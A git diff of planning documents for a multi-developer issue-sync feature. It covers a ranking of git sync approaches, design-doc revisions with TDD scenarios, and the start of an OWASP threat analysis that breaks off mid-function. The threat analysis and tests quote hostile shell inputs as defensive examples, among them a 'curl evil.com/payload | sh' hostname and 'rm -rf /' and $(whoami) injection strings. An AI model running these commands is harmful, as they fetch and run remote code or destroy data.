+| Compatibility | 8/10 | Works with any workflow, but some hosting platforms strip notes on fork operations. GitHub preserves notes but doesn't display custom refs in UI. |
+| Offline support | 10/10 | Full offline. |
+| Implementation complexity | 6/10 | Conceptual mismatch is the issue. Notes attach to commits, but beads data is global state. You'd need a sentinel commit or a workaround to store global JSONL. More awkward than custom refs. |
+
+**Fundamental limitation:** Notes are designed to annotate *specific commits*. Beads data is a global issue list, not per-commit metadata. You'd have to pick an arbitrary commit to attach the data to (e.g., always the root commit), which is a hack. git-appraise works because reviews genuinely annotate commits. git-bug chose custom refs over notes for exactly this reason.
+
+---
+
+### Rank 3: Orphan Branch (`beads/sync`)
+
+**How it works:** Create a branch with `git checkout --orphan beads/sync` that has no shared history with the code branches. Store only `.beads/` files there. This is the same pattern GitHub Pages uses with `gh-pages`.
+
+**Prior art:** `gh-pages` branch is the canonical example. Many projects use orphan branches for generated docs, coverage reports, etc.
+
+**Evaluation:**
+| Dimension | Score | Notes |
+|-----------|-------|-------|
+| Developer UX | 7/10 | Shows up in `git branch` list. Developers see it and wonder what it is. Not confusing to experienced git users (gh-pages pattern is well-known), but adds noise. |
+| Onboarding friction | 6/10 | Need to explain "don't checkout that branch, it's for metadata." Hook scripts can automate sync, but the branch is visible and invites questions. |
+| Merge conflict handling | 7/10 | Standard git merge on the orphan branch. JSONL append-only helps, but concurrent pushes to same branch = normal merge conflicts. Need either locking or a custom merge driver for `.jsonl` files. |
+| Compatibility | 9/10 | Works everywhere. Orphan branches are standard git. gh-pages proved the pattern. |
+| Offline support | 10/10 | Full offline. |
+| Implementation complexity | 5/10 | Easiest to implement. Standard git commands. But sync logic (checkout orphan, update files, commit, push, checkout back) is error-prone with worktrees. |
+
+**Advantage over "dedicated branch":** No shared history means the branch never accidentally merges into code branches. Cleaner than option 2 (dedicated `beads/sync` branch with shared history).
+
+**Disadvantage:** Concurrent pushes to the same branch cause fast-forward failures. Need retry logic or per-developer branches that merge.
+
+---
+
+### Rank 4: Sync to Master/Develop (Original Option 1)
+
+**How it works:** `.beads/` directory lives alongside code on the main branch. Every commit can include beads changes. Branch protection allows `.beads/` pushes.
+
+**Evaluation:**
+| Dimension | Score | Notes |
+|-----------|-------|-------|
+| Developer UX | 6/10 | Simplest mental model — files are just there. But beads changes pollute `git log`, `git diff`, PR diffs. Every feature branch has stale beads data. |
+| Onboarding friction | 9/10 | Zero new concepts. Files in a directory. |
+| Merge conflict handling | 4/10 | Every branch has its own copy of beads data. Merging feature branches = merge conflicts on `.beads/` files constantly. 5 developers x 2-3 sessions = guaranteed conflicts. |
+| Compatibility | 6/10 | Requires branch protection exemptions for `.beads/`. Doesn't work with fork-based workflows (PRs from forks can't push to upstream `.beads/`). |
+| Offline support | 10/10 | Full offline. |
+| Implementation complexity | 9/10 | Trivial. `git add .beads/ && git commit && git push`. |
+
+**Fatal flaw:** With 5 developers and 10-15 parallel sessions, beads data diverges immediately across branches. Each feature branch has stale data. Merges are a nightmare. This is the worst approach for multi-developer scenarios despite being the simplest.
+
+---
+
+### Rank 5: Dedicated `beads/sync` Branch (Original Option 2)
+
+**How it works:** A regular branch (with shared history from where it was created) dedicated to beads data.
+
+**Evaluation:**
+| Dimension | Score | Notes |
+|-----------|-------|-------|
+| Developer UX | 6/10 | Same visibility concerns as orphan branch, plus shared history means accidental merges are possible. |
+| Onboarding friction | 6/10 | Must explain the branch and the sync workflow. |
+| Merge conflict handling | 7/10 | Same as orphan branch — concurrent pushes conflict. |
+| Compatibility | 8/10 | Standard git. |
+| Offline support | 10/10 | Full offline. |
+| Implementation complexity | 5/10 | Easy. Standard git. |
+
+**Strictly worse than orphan branch** — shared history adds risk of accidental merge with no offsetting benefit.
+
+---
+
+### Rank 6: Git Submodule for `.beads/`
+
+**How it works:** Create a separate repo for beads data. Include it as a submodule at `.beads/`.
+
+**Evaluation:**
+| Dimension | Score | Notes |
+|-----------|-------|-------|
+| Developer UX | 3/10 | Submodules are universally disliked. Extra `git submodule update --init` on clone. Detached HEAD states. Forgotten submodule commits. |
+| Onboarding friction | 2/10 | Must explain submodules, a concept most developers actively avoid. Onboarding docs double in size. |
+| Merge conflict handling | 6/10 | Conflicts are in the submodule repo, which is simpler (only JSONL files). But submodule pointer conflicts in the parent repo are common and confusing. |
+| Compatibility | 5/10 | Works technically, but CI, hooks, and tooling all need submodule awareness. Many git GUIs handle submodules poorly. |
+| Offline support | 8/10 | Works offline but requires both repos cloned. |
+| Implementation complexity | 4/10 | Moderate setup, high ongoing maintenance burden. |
+
+**Not recommended.** The cognitive overhead of submodules far outweighs any architectural benefit for a simple JSONL sync problem.
+
+---
+
+### Rank 7: Smudge/Clean Filters
+
+**How it works:** Git attributes with `filter=beads` on `.beads/*`. Smudge filter runs on checkout (could pull latest from remote). Clean filter runs on commit (could push).
+
+**Evaluation:**
+| Dimension | Score | Notes |
+|-----------|-------|-------|
+| Developer UX | 5/10 | Truly invisible when working... but breaks in surprising ways. Network calls in smudge/clean are fragile (offline? slow?). Filters must be idempotent (smudge -> clean = identity). |
+| Onboarding friction | 4/10 | Must configure git config for the filter driver. If not configured, files are checked out raw (silent failure). Must understand a very niche git feature. |
+| Merge conflict handling | 3/10 | Filters don't help with merges. Still get normal merge conflicts on the files. Filters just transform content on checkout/checkin — they don't merge. |
+| Compatibility | 4/10 | Requires per-machine config. Different filter behavior across machines is a nightmare to debug. |
+| Offline support | 2/10 | If smudge filter makes network calls, offline = broken checkout. If it doesn't, what's the point? |
+| Implementation complexity | 3/10 | High complexity for low reward. Filter drivers are hard to debug, especially cross-platform. |
+
+**Not recommended.** Smudge/clean filters are designed for content transformation (line endings, keyword expansion), not data synchronization. Wrong tool for the job.
+
+---
+
+### Rank 8: GitHub Actions / Webhooks
+
+**How it works:** A GitHub Action triggers on push events. It reads `.beads/` from the pushed branch and syncs it to a central location (another branch, release artifact, etc.).
+
+**Evaluation:**
+| Dimension | Score | Notes |
+|-----------|-------|-------|
+| Developer UX | 7/10 | Invisible sync — happens in the cloud. But introduces latency (Actions take 10-30s to start). And requires GitHub specifically. |
+| Onboarding friction | 5/10 | Must understand the Action exists. Debugging sync failures requires CI knowledge. |
+| Merge conflict handling | 6/10 | Action can implement smart merging (read all branches, merge JSONL, commit). But race conditions between concurrent Action runs are hard to handle. |
+| Compatibility | 3/10 | GitHub-only. Doesn't work with GitLab, Bitbucket, self-hosted. Tied to a specific platform. |
+| Offline support | 0/10 | Zero offline support. Requires push to GitHub + Action execution. If GitHub is down, no sync. |
+| Implementation complexity | 6/10 | Moderate. Writing the Action YAML + merge script. But debugging CI-based sync is painful. |
+
+**Not recommended as primary mechanism.** Could be a useful *supplement* (e.g., Action that validates beads data integrity on PR), but cannot be the primary sync mechanism due to zero offline support and platform lock-in.
+
+---
+
+## Summary Ranking
+
+| Rank | Approach | UX Score | Key Advantage | Key Risk |
+|------|----------|----------|---------------|----------|
+| 1 | **Custom Hidden Refs** (`refs/beads/*`) | 10/10 | Completely invisible, conflict-free JSONL merge, proven by git-bug (9.7k stars) | Requires git plumbing knowledge to implement |
+| 2 | **Git Notes** (`refs/notes/beads`) | 9/10 | Built-in merge strategies, invisible | Conceptual mismatch (notes are per-commit, beads is global) |
+| 3 | **Orphan Branch** | 7/10 | Well-known pattern (gh-pages), standard git | Visible in branch list, concurrent push conflicts |
+| 4 | Sync to Master | 6/10 | Zero new concepts | Merge conflict hell with 5+ developers |
+| 5 | Dedicated Branch | 6/10 | Easy to understand | Strictly worse than orphan branch |
+| 6 | GitHub Actions | 7/10 | Zero local config | No offline, platform lock-in |
+| 7 | Submodule | 3/10 | Clean separation | Everyone hates submodules |
+| 8 | Smudge/Clean | 5/10 | Truly invisible when working | Wrong tool, fragile, no merge help |
+
+---
+
+## Recommendation
+
+**Primary: Custom Hidden Refs (`refs/beads/*`)** — This is the clear winner.
+
+The pattern is proven at scale by two major open-source tools:
+- **git-bug** (9.7k stars): Custom refs under `refs/bugs/*`, CRDT-based conflict resolution
+- **git-appraise** (5.3k stars, Google): Custom notes refs under `refs/notes/devtools/*`, JSONL with `cat_sort_uniq` merging
+
+For beads specifically, the implementation would be a hybrid:
+1. Store data under `refs/beads/data` (git-bug's custom ref approach)
+2. Use JSONL format with `cat | sort | uniq` merging (git-appraise's merge approach)
+3. Auto-configure refspecs during `bunx forge setup` so sync is invisible
+4. Wrap in `bd sync` command: reads ref -> merges with local -> writes ref -> push
+
+**The developer experience is:** run `bd sync` (or have it auto-run via hooks), and everyone's beads data is merged. No branches, no checkout switching, no merge conflicts, no conceptual overhead. The data lives in the git object store but never appears in the working tree, `git log`, or PR diffs.
+
+---
+
+## Implementation Sketch (for reference, not for coding now)
+
+```
+# One-time setup (automated in `bunx forge setup`):
+git config --add remote.origin.fetch '+refs/beads/*:refs/remotes/origin/beads/*'
+git config --add remote.origin.push 'refs/beads/data:refs/beads/data'
+
+# bd sync (what happens under the hood):
+1. git fetch origin refs/beads/data
+2. Extract remote JSONL: git show refs/remotes/origin/beads/data:issues.jsonl
+3. Merge: cat local.jsonl remote.jsonl | sort | uniq > merged.jsonl
+4. Hash merged content: git hash-object -w merged.jsonl
+5. Create tree + commit under refs/beads/data
+6. git push origin refs/beads/data
+
+# Conflict resolution: NONE needed
+# JSONL + sort + uniq = deterministic, conflict-free merge
+# Two developers adding different issues = both lines kept
+# Two developers adding same issue = deduplicated
+```
+
+---
+
+## Open Questions for Implementation
+
+1. **Auto-sync timing:** Should `bd sync` run automatically on every `git push`/`git pull` (via hooks), or only when explicitly called? Auto-sync is more invisible but adds latency to every push.
+
+2. **Per-issue refs vs single ref:** git-bug uses one ref per bug (`refs/bugs/<id>`). We could use one ref for all beads data (`refs/beads/data`) or one per issue (`refs/beads/issues/<id>`). Single ref is simpler; per-issue allows finer-grained sync but adds complexity.
+
+3. **File-index sync:** `file-index.jsonl` tracks which developer is working on which files. This is inherently ephemeral/real-time data. Should it sync via the same mechanism, or is it better suited to a lightweight approach (e.g., just overwrite with latest on each sync, last-writer-wins)?
+
+4. **Refspec auto-configuration:** How to ensure `git clone` automatically gets the refspec? Options: document in README, add to `.gitconfig` in repo (doesn't auto-apply), or detect on first `bd` command and auto-configure.

--- a/docs/plans/2026-03-22-multi-dev-awareness-decisions.md
+++ b/docs/plans/2026-03-22-multi-dev-awareness-decisions.md
@@ -1,0 +1,7 @@
+# Multi-Dev Session Awareness — Decisions Log
+
+**Beads**: forge-w69s | **Branch**: feat/multi-dev-awareness
+
+---
+
+<!-- Decisions will be appended below as they arise during /dev -->

--- a/docs/plans/2026-03-22-multi-dev-awareness-design.md
+++ b/docs/plans/2026-03-22-multi-dev-awareness-design.md
@@ -55,17 +55,26 @@ Over-engineered for 5 developers. Breaks the git-native, offline-capable philoso
    - Module-level output by default, function-level via `--detail` flag (uses grep, not AST)
    - Exit codes: 0 = no conflicts, 1 = conflicts found (for gate integration)
 
-4. **Sync branch auto-detection**:
-   - Primary: `git remote show origin | grep 'HEAD branch'`
-   - Override: `.beads/config.json` field `sync_branch` or env var `BD_SYNC_BRANCH`
-   - Fallback order: config > env > auto-detect > "main" > "master"
+4. **Pluggable sync backend**:
+   - `refs` (default): Custom hidden refs (`refs/beads/*`). Invisible to developers — never shows in branches, PRs, or git log. Proven by git-bug (9.7k stars) and git-appraise (Google). JSONL merges via `cat | sort | uniq`.
+   - `branch`: Dedicated `beads/sync` branch. For teams that can't use custom refs or need auditability.
+   - `inline`: Beads data on the code branch (master/develop). Simplest, zero config. Current behavior.
+   - Config: `.beads/config.json` `sync_backend` field. Fallback detection if `refs` push fails → auto-downgrade to `inline`.
+   - `bd sync` abstracts the backend — developers just run `bd sync` regardless.
 
-5. **Session identity**:
-   - Format: `git config user.name` + `@` + `hostname`
+5. **Sync remote + branch detection** (for `branch` and `inline` backends):
+   - Primary: `git symbolic-ref refs/remotes/origin/HEAD`
+   - Fallback: `git remote show origin | grep 'HEAD branch'`
+   - Override: `.beads/config.json` `sync_branch` or `BD_SYNC_BRANCH` env var
+   - Fork detection: if `upstream` remote exists, sync from `upstream`. Override via `sync_remote`.
+
+6. **Session identity**:
+   - Format: `$(git config user.email)@$(hostname -s)` — prefer email for uniqueness
+   - Fallback: `git config user.name` if email not set
+   - Validate: `^[a-zA-Z0-9._@+-]+$` (OWASP A03)
    - Stored via `--assignee` on `bd update --claim`
-   - Distinguishes parallel sessions from the same developer
 
-6. **Soft block integration**:
+7. **Soft block integration**:
    - `/plan` entry gate: run conflict-detect, show overlaps, require `y/n` to proceed
    - `/dev` entry gate: same check
    - Not a hard block — developers can always proceed with confirmation

--- a/docs/plans/2026-03-22-multi-dev-awareness-design.md
+++ b/docs/plans/2026-03-22-multi-dev-awareness-design.md
@@ -2,7 +2,7 @@
 
 - **Feature**: multi-dev-awareness
 - **Date**: 2026-03-22
-- **Status**: Phase 1 complete
+- **Status**: Phase 2 complete
 - **Beads**: forge-w69s (Layer 1 of forge-qml5 epic)
 
 ---
@@ -104,6 +104,132 @@ Over-engineered for 5 developers. Breaks the git-native, offline-capable philoso
 ## Ambiguity Policy
 
 7-dimension rubric scoring. Confidence >= 80%: proceed and document in decisions log. Confidence < 80%: stop and ask user. (Per project-wide policy.)
+
+## Technical Research
+
+### Key Findings
+
+**Conflict Detection Techniques**:
+- `git diff --name-only <base>...<branch>` — cheap file-level overlap detection across branches
+- `git merge-tree` (git >= 2.38) — predicts merge conflicts without side effects. Already used in `smart-status.sh` Tier 2 (lines 391-482)
+- Extend existing `smart-status.sh` Tier 1/2 logic for cross-developer detection (currently local-only)
+
+**JSONL Merge Strategy**:
+- Append-only JSONL with unique IDs and `updated_at` timestamps is naturally merge-friendly
+- Last-write-wins (LWW) per-record by `updated_at` handles same-issue conflicts
+- No CRDT complexity needed — git's line-based merge + `bd resolve-conflicts` handles edge cases
+- `.beads/file-index.jsonl` follows same pattern as `issues.jsonl`
+
+**Default Branch Detection** (3-method fallback):
+1. `git symbolic-ref refs/remotes/origin/HEAD` — fast, cached locally
+2. `git remote show origin | grep 'HEAD branch'` — live/accurate, requires network
+3. Common name check: try `main`, then `master`
+- Config override via `.beads/config.json` `sync_branch` or `BD_SYNC_BRANCH` env var takes precedence
+
+**Session Identity** (cross-platform):
+- `hostname -s` — portable across Linux/macOS/Windows Git Bash. Confirmed working.
+- `$HOSTNAME` is bash-specific; `$COMPUTERNAME` is Windows-only
+- Format: `$(git config user.email)@$(hostname -s)` — prefer email over name for uniqueness
+- Validate against `^[a-zA-Z0-9._@+-]+$` (OWASP A03 — injection prevention)
+
+**Existing Code to Extend** (DRY check results):
+| What | Where | Action |
+|------|-------|--------|
+| File-overlap detection (Tier 1) | `smart-status.sh:311-389` | EXTEND for cross-dev |
+| Merge-tree conflicts (Tier 2) | `smart-status.sh:391-482` | EXTEND for cross-dev |
+| Ripple/keyword detection | `dep-guard.sh:check-ripple` | KEEP as-is (different concern) |
+| Input sanitization pattern | `dep-guard.sh:69-83` | REUSE `sanitize()` in new scripts |
+| Worktree parsing | `smart-status.sh:205-248` | REUSE for session detection |
+| HARD-GATE pattern | `.claude/commands/plan.md:1-30` | EXTEND with soft-block gate |
+
+**New artifacts to create**:
+| What | Path |
+|------|------|
+| File index | `.beads/file-index.jsonl` |
+| Conflict detection script | `scripts/conflict-detect.sh` |
+| Beads config | `.beads/config.json` |
+
+### OWASP Top 10 Analysis
+
+Full analysis: [2026-03-22-multi-dev-awareness-owasp-analysis.md](2026-03-22-multi-dev-awareness-owasp-analysis.md)
+
+**High-priority mitigations** (must implement):
+
+| Category | Risk | Mitigation |
+|----------|------|------------|
+| A03: Injection | Shell injection via developer names, hostnames, file paths in bash scripts | Reuse `sanitize()` from `dep-guard.sh`. Validate session identity format `^[a-zA-Z0-9._@+-]+$`. Quote all variables. Use `printf '%s'` not `echo`. |
+| A04: Insecure Design | Race condition in concurrent `bd sync` (JSONL-in-git has no locking). TOCTOU gap between conflict detection and gate entry. | Freshness window (re-validate at gate entry if >15 min stale). Optimistic concurrency via `updated_at`. JSONL append-only format minimizes conflict surface. |
+| A07: Identification | `gituser@hostname` is trivially spoofable | Prefer `git config user.email`. Recommend (don't require) commit signing. Advisory — git itself has no auth. |
+| A09: Logging | No audit trail for sync operations and conflict overrides | Log sync events via `bd comments add`. Record conflict override decisions with rationale. |
+
+**Low-priority** (acceptable risk for v1):
+
+| Category | Risk | Decision |
+|----------|------|----------|
+| A01: Access Control | Any git pusher can modify another dev's issues | Acceptable — git push access = trust. Diff-based validation deferred to Approach C. |
+| A02: Crypto | JSONL files lack integrity checksums | Acceptable — git provides SHA-based integrity. |
+| A08: Data Integrity | Truncated sync could corrupt data | `bd sync` should validate JSONL structure post-pull. |
+
+### TDD Test Scenarios
+
+**1. Happy path — conflict detection finds overlap**
+- Setup: Two issues in file-index.jsonl, both touching `src/lib/status.ts`
+- Input: `conflict-detect.sh --issue forge-abc`
+- Expected: Exit code 1, output shows overlap with other issue, module `src/lib/`
+- Assertion: Output contains developer identity and conflicting issue ID
+
+**2. Happy path — no conflicts**
+- Setup: Two issues in file-index.jsonl, touching different modules
+- Input: `conflict-detect.sh --issue forge-abc`
+- Expected: Exit code 0, no warnings
+- Assertion: Clean output, no overlap messages
+
+**3. Sync branch auto-detection fallback chain**
+- Setup: No config, no env var, `git symbolic-ref` fails (no remote HEAD cached)
+- Input: `get-sync-branch` function called
+- Expected: Falls back to `git remote show origin`, then `main`, then `master`
+- Assertion: Correct branch returned at each fallback level
+
+**4. Session identity format validation**
+- Input: Various identity strings including injection attempts (`; rm -rf /`, `$(whoami)`, `user@host`)
+- Expected: Valid identities pass, injection attempts rejected
+- Assertion: Only `^[a-zA-Z0-9._@+-]+$` matches accepted
+
+**5. Stale sync warning**
+- Setup: Last sync timestamp >15 min ago
+- Input: `conflict-detect.sh --issue forge-abc`
+- Expected: Warning message with "last synced X min ago", conflict check still runs
+- Assertion: Warning present, exit code still reflects conflict state (not staleness)
+
+**6. File index update on issue state change**
+- Setup: Issue transitions to `in_progress` with task list specifying files
+- Input: `update-file-index forge-abc docs/plans/task-list.md`
+- Expected: `.beads/file-index.jsonl` gains entry with issue ID, developer, files, modules
+- Assertion: JSONL entry parseable, contains correct file paths and module groupings
+
+**7. Offline/network failure graceful degradation**
+- Setup: `bd sync` fails (no network)
+- Input: Forge command entry triggers sync
+- Expected: Warning "sync failed, working with local data", command proceeds
+- Assertion: No crash, stale data used, warning displayed
+
+**8. Concurrent sync merge resolution**
+- Setup: Two developers modify `.beads/file-index.jsonl` simultaneously, push
+- Input: `bd sync` on second developer
+- Expected: Git merge succeeds (append-only JSONL), or `bd resolve-conflicts` triggered
+- Assertion: No data loss, both entries present in merged file
+
+**9. Edge case — issue with no task list**
+- Setup: Issue in beads with no design doc or task file
+- Input: `update-file-index forge-xyz` (no task file path)
+- Expected: Falls back to title/description keyword matching, flags "low confidence"
+- Assertion: File index entry created with `confidence: "low"`, module derived from keywords
+
+**10. Soft block confirmation flow**
+- Setup: Conflict detected at `/plan` entry
+- Input: User enters `/plan` with overlapping module
+- Expected: Shows conflicts, prompts y/n, proceeds only on `y`
+- Assertion: `n` exits cleanly with no side effects, `y` proceeds to Phase 1
 
 ## Future Enhancements (Approach C — deferred)
 

--- a/docs/plans/2026-03-22-multi-dev-awareness-design.md
+++ b/docs/plans/2026-03-22-multi-dev-awareness-design.md
@@ -1,0 +1,114 @@
+# Multi-Dev Session Awareness - Design Doc
+
+- **Feature**: multi-dev-awareness
+- **Date**: 2026-03-22
+- **Status**: Phase 1 complete
+- **Beads**: forge-w69s (Layer 1 of forge-qml5 epic)
+
+---
+
+## Purpose
+
+Enable 5 developers (each running 2-3 parallel AI/human sessions) to see what others are working on and avoid stepping on each other. Currently, beads + worktrees handle intra-developer coordination (within one laptop), but there is zero cross-developer visibility. This causes:
+
+- Silent file/module conflicts discovered only at PR merge time
+- Duplicate work when two devs unknowingly tackle the same area
+- Wasted effort when someone builds on another dev's unfinished work
+
+## Success Criteria
+
+1. `bd sync` at entry of every Forge command pulls latest beads state from the shared sync branch
+2. `/status` shows all in-progress issues across ALL developers, grouped by developer identity (`user@hostname`), with module-level overlap warnings
+3. Soft block on `/plan` and `/dev` entry when another developer has in-progress work in the same module — requires explicit confirmation to proceed
+4. `bd conflicts` (new script) shows module-level overlap with drill-down to function-level on `--detail`
+5. Session identity stored on beads issues: `developer@hostname` format distinguishes a developer's multiple sessions
+6. Sync branch auto-detected from remote default, with config override for git flow (`develop`) and custom setups
+
+## Out of Scope
+
+- Real-time WebSocket/push-based conflict alerts (deferred to Approach C / future Layer 3 - forge-wzpb)
+- Full AST-based function-level parsing in the hot path (function-level available on-demand via grep, not AST)
+- Auto-unclaiming abandoned issues (too destructive — show staleness warnings instead)
+- PR-level conflict detection (covered by GitHub's own merge conflict detection)
+- Cross-repository/fork coordination beyond remote auto-detection
+
+## Approach Selected: B — Beads + File Index
+
+### Why not A (Beads-Native only)?
+Without a file index, every conflict check must re-parse all task lists from all developers. With 10-15 concurrent issues across 5 devs, this becomes slow and brittle.
+
+### Why not C (External Coordination Service)?
+Over-engineered for 5 developers. Breaks the git-native, offline-capable philosophy. Adds infrastructure dependency. Deferred as future enhancement.
+
+### Approach B Details
+
+1. **Auto-sync at command entry**: Every Forge command (`/status`, `/plan`, `/dev`, `/validate`, `/ship`, `/review`) runs `bd sync` at entry to pull latest beads state from the sync branch.
+
+2. **File index** (`.beads/file-index.jsonl`): Maps `{issue_id, developer, files[], modules[], updated_at}`. Updated when:
+   - An issue transitions to `in_progress` (from task list file paths)
+   - Tasks are completed (progress updates refine the touched files)
+   - An issue is closed (entry removed from index)
+
+3. **Conflict detection script** (`scripts/conflict-detect.sh`):
+   - Reads file index, groups by module (directory-level)
+   - Cross-references with current developer's planned/in-progress work
+   - Module-level output by default, function-level via `--detail` flag (uses grep, not AST)
+   - Exit codes: 0 = no conflicts, 1 = conflicts found (for gate integration)
+
+4. **Sync branch auto-detection**:
+   - Primary: `git remote show origin | grep 'HEAD branch'`
+   - Override: `.beads/config.json` field `sync_branch` or env var `BD_SYNC_BRANCH`
+   - Fallback order: config > env > auto-detect > "main" > "master"
+
+5. **Session identity**:
+   - Format: `git config user.name` + `@` + `hostname`
+   - Stored via `--assignee` on `bd update --claim`
+   - Distinguishes parallel sessions from the same developer
+
+6. **Soft block integration**:
+   - `/plan` entry gate: run conflict-detect, show overlaps, require `y/n` to proceed
+   - `/dev` entry gate: same check
+   - Not a hard block — developers can always proceed with confirmation
+
+## Constraints
+
+- Must work offline (git-native, no external services)
+- Must support git flow (`develop` branch), trunk-based (`main`/`master`), and custom branch strategies
+- Must not break existing single-developer workflow
+- Must handle stale sync gracefully (warn, don't block)
+- `.beads/file-index.jsonl` must be mergeable (append-only JSONL, same pattern as `issues.jsonl`)
+- Zero new dependencies — bash scripts + existing beads CLI only
+
+## Edge Cases
+
+1. **Stale sync**: Show "last synced X min ago" warning if >15 min since last `bd sync`. Advisory only — don't block.
+
+2. **JSONL merge conflicts**: `bd resolve-conflicts` already handles `.beads/` JSONL merges. File index follows the same pattern (append-only, last-write-wins per issue_id).
+
+3. **Orphaned claims**: Developer claims an issue, then disappears (crash, vacation). Show staleness in `/status` ("claimed 3 days ago, no commits since"). Never auto-unclaim — that's destructive. Human must explicitly `bd update <id> --assignee ""` to release.
+
+4. **Git flow / develop branch**: Sync target configurable via `.beads/config.json` `sync_branch` field or `BD_SYNC_BRANCH` env var. Auto-detect from `git remote show origin` as default.
+
+5. **Fork-based workflows**: Detect `upstream` remote. If present, sync from `upstream` instead of `origin`. Configurable via `sync_remote` in `.beads/config.json`.
+
+6. **No task list**: Issue created outside Forge workflow (no task file with `File(s):` entries). Fall back to issue title + description for keyword-based module detection. Flag as "low confidence" in conflict output.
+
+7. **Same module, no real conflict**: Two devs touch `src/lib/` but different files. Module-level warning shown, `--detail` reveals no file overlap. Developer confirms to proceed.
+
+8. **Network offline**: `bd sync` fails gracefully — warn "sync failed, working with local data (last sync: timestamp)", proceed with stale data. Never block work due to network.
+
+9. **Branch protection conflicts**: If sync branch has strict protection that blocks `.beads/` pushes, `bd sync` should detect and warn with instructions to configure branch protection rules.
+
+10. **Concurrent bd sync**: Two developers run `bd sync` simultaneously. JSONL append-only format + git's own merge handling should resolve this. If git merge fails, `bd resolve-conflicts` kicks in.
+
+## Ambiguity Policy
+
+7-dimension rubric scoring. Confidence >= 80%: proceed and document in decisions log. Confidence < 80%: stop and ask user. (Per project-wide policy.)
+
+## Future Enhancements (Approach C — deferred)
+
+- Real-time WebSocket coordination server for push-based conflict alerts
+- Full AST-based function-level conflict detection
+- Live session heartbeats (detect abandoned sessions automatically)
+- Team dashboard UI (web-based or TUI)
+- Cross-repository dependency tracking for monorepo/polyrepo setups

--- a/docs/plans/2026-03-22-multi-dev-awareness-owasp-analysis.md
+++ b/docs/plans/2026-03-22-multi-dev-awareness-owasp-analysis.md
@@ -1,0 +1,372 @@
+# OWASP Top 10 (2021) Analysis: Multi-Developer Session Awareness
+
+**Feature scope**: `bd sync` push/pull of `.beads/issues.jsonl` and `.beads/file-index.jsonl` to a shared git branch, `conflict-detect.sh` bash script for cross-referencing in-progress issues across developers, session identity as `gituser@hostname`, auto-detection of sync branch from `git remote show origin`, soft blocks at `/plan` and `/dev` entry gates when module overlap is detected.
+
+**Date**: 2026-03-22
+**Analyst**: Security Audit (DevSecOps)
+**Related**: See also `2026-03-21-issue-sync-owasp-analysis.md` (GitHub Actions sync — different attack surface)
+
+---
+
+## A01: Broken Access Control
+
+**Applies**: YES — HIGH RELEVANCE
+
+**Risk**: Any developer with git push access to the sync branch can modify `.beads/issues.jsonl` directly, altering another developer's issue assignments, status, priorities, or closing their issues. Since beads data is a flat JSONL file tracked in git, there is no server-side access control layer — the "database" is a shared text file.
+
+**Specific attack vectors**:
+1. **Assignee spoofing**: Developer A edits the JSONL to reassign Developer B's in-progress issue to themselves, or changes the `owner` field to claim credit.
+2. **Issue tampering**: A developer modifies another developer's issue description, acceptance criteria, or notes to alter the historical record.
+3. **Silent status manipulation**: Closing or reopening another developer's issues via direct JSONL edit, bypassing any workflow gates.
+4. **Priority escalation**: Changing `priority` on someone else's issue to deprioritize it relative to their own work.
+
+**Mitigations**:
+1. **Git commit signing (GPG/SSH)**: Require signed commits on the sync branch so every JSONL modification has a cryptographically verified author. Add verification in `conflict-detect.sh`:
+   ```bash
+   # Verify last sync commit is signed
+   git log -1 --format='%G?' -- .beads/issues.jsonl | grep -qE '^[GU]' || \
+     echo "WARNING: Unsigned beads sync commit detected" >&2
+   ```
+2. **Diff-based ownership validation**: Before accepting a `bd sync` pull, parse the incoming diff and reject changes to issues where `owner` does not match the commit author. Implement as a pre-merge hook.
+3. **Append-only sync model**: Instead of full-file replacement, use an append-only event log (`issue-events.jsonl`) where each event records `{actor, timestamp, action, issue_id, delta}`. Tampering with historical events is detectable via hash chains.
+4. **Git blame audit**: `conflict-detect.sh` should use `git log` on `.beads/issues.jsonl` to verify each issue line was last modified by its owner. Flag discrepancies as warnings.
+
+**Severity**: MEDIUM — mitigated by git's built-in attribution (commits show who changed what), but not enforced programmatically.
+
+---
+
+## A02: Cryptographic Failures
+
+**Applies**: LOW RELEVANCE
+
+**Risk**: Session identity is `gituser@hostname` — this is not a cryptographic credential but a plain-text identifier. No secrets are stored in beads data files. However:
+
+1. **No integrity verification**: The JSONL files have no checksums or signatures. A corrupted file (disk error, partial write during sync) is silently accepted.
+2. **Hostname as identity**: Hostnames are trivially spoofable. If two developers share a machine or use generic hostnames (common Windows defaults like `DESKTOP-ABC123`), identity collisions occur.
+
+**Mitigations**:
+1. **SHA-256 checksum file**: After each `bd sync` write, generate `.beads/issues.jsonl.sha256`. Verify on pull before applying:
+   ```bash
+   sha256sum .beads/issues.jsonl > .beads/issues.jsonl.sha256
+   ```
+2. **Use `git config user.email` as primary identity** instead of hostname. Email is already configured per-developer in git config and is more unique than hostname.
+3. **Git commit signatures** (same as A01) provide cryptographic proof of authorship.
+
+**Severity**: LOW — no secrets at risk, but integrity validation is missing.
+
+---
+
+## A03: Injection
+
+**Applies**: YES — HIGH RELEVANCE
+
+**Risk**: The `conflict-detect.sh` script reads developer names, hostnames, file paths, and issue titles from JSONL data and uses them in shell operations. The existing codebase has a strong `sanitize()` function (verified in `dep-guard.sh` lines 69-83, `beads-context.sh` lines 40-54, `smart-status.sh` lines 27-40) that strips `$(...)`, backticks, semicolons, and double quotes. However, `conflict-detect.sh` is a NEW script that must adopt these same patterns.
+
+**Specific attack vectors**:
+1. **Malicious issue title**: A developer creates an issue titled `` test $(rm -rf /) `` — if the title is interpolated into a shell command without sanitization, arbitrary code executes. Evidence this is realistic: issue `forge-04t` in the existing `.beads/issues.jsonl` already contains `echo PWNED2  rm -rf /` in its notes field (from the prior OWASP analysis).
+2. **Hostile hostname in session identity**: If `gituser@hostname` is constructed from `$(hostname)` output and a system has hostname set to ``; curl evil.com/payload | sh``, unquoted usage enables injection.
+3. **File paths with special characters**: `.beads/file-index.jsonl` contains file paths. Paths with spaces, newlines, or shell metacharacters (`$`, backticks, `|`, `&`) can break `grep`, `diff`, or `git` commands if not properly quoted.
+4. **JSONL field injection**: If `jq` output is interpolated into shell strings without quoting, fields containing `\n`, `\t`, or shell metacharacters can escape their context.
+
+**Mitigations**:
+1. **MANDATORY: Reuse the existing `sanitize()` function** from `dep-guard.sh`. Do not write a new one — import or copy the proven implementation:
+   ```bash
+   # From dep-guard.sh lines 69-83 — strips $(...), backticks, semicolons, quotes, newlines
+   sanitize() {
+     local val="$1"
+     val="${val//\"/}"
+     val="$(printf '%s' "$val" | sed -e ':loop' -e 's/\$([^()]*)//g' -e 't loop')"
+     val="${val//\`/}"
+     val="${val//;/}"
